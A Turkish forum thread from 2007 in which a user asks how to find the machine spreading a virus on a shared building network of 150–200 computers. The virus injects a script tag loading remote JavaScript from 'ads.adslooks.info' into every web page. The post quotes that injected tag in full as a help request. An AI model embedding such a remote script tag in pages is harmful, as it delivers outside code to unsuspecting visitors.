Agdaki Virüs Nasil Tespit edilir???

emoz159
25-11-2007, 22:09   |  #1  
OP Üye
Teşekkür Sayısı: 3
96 mesaj
Kayıt Tarihi:Kayıt: Nis 2004

Merhabalar....

Binamizda herkesin ortak kullandigi bir Internet agimiz var.

Fakat biz bize sadece Internet yetmez Film de izleyelim, Dosya da paslasalim dedik ve 1 bilgisayara Linux yükleyip 1400GB lik bir Arsiv haline dönüstürdük. Fakat bir arkadas bu bilgisayara bir Oyun yükledi söylentileri etrafta dolasiyor. Oyun yüklemesi sorunumuz degil tabiki Terleme

Sorun su ki virus bulastirmis bi yerlere. Kaspersky ile Network Surucusunu tarattim bayagi etkilenmis bi dosya buldu. Bunlari Disinfect yapti. Ama virus uyarisi halen daha geliyor.

virüs agdaki herhangi bir bilgisayara bulasiyor ve agdaki herhangi bir

bilgisayardan girilen her web sayfasinin basina asagidaki satiri yaziyor...

<SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.adslooks.info/ads.js"></SCRIPT>

"ads.adslooks.info" kismi degisebiliyor bazen..

Interneti kullanan her kullaniciya bilgisayarlarini virus testinden gecirmelerini neler yapmasi gerektigini ögütledik ama cogu acemi kullanici oldugu icin pek ugrasmadilar galiba. Her biri ile tek tek ugrasmak da bayagi vaktimizi alacagi icin bizde ugrasmak istemedim ( 150-200 arasi bir bilgisayar var ama tam sayiyi hatirlamiyorum ).

Bu virus olan bilgisayari tespit etmenin bi yolu var mi acaba. Yardimci olursaniz 150-200 kisi size bayagi dua edicek. Her internet sayfasi actigimizda uyari cikmasi hepimizi cok rahatsiz ediyor.

(Kendi bilgisayarimda bu yüzden bariz bir yavaslama soz konusu. 3 farkli antivirus ile bilgisayari tarattim. Spybot  Spyware ile birer kez daha tarattim. Ama yavasligi dewam ediyor yine. 1 senedir format atmamistim. Formatlama vakti geldi galiba )

edifice87
28-11-2007, 11:57   |  #2  
Taze Üye
Teşekkür Sayısı: 0
2 mesaj
Kayıt Tarihi:Kayıt: Kas 2007

aynı virüs banada bulasti ne yapmam lazım?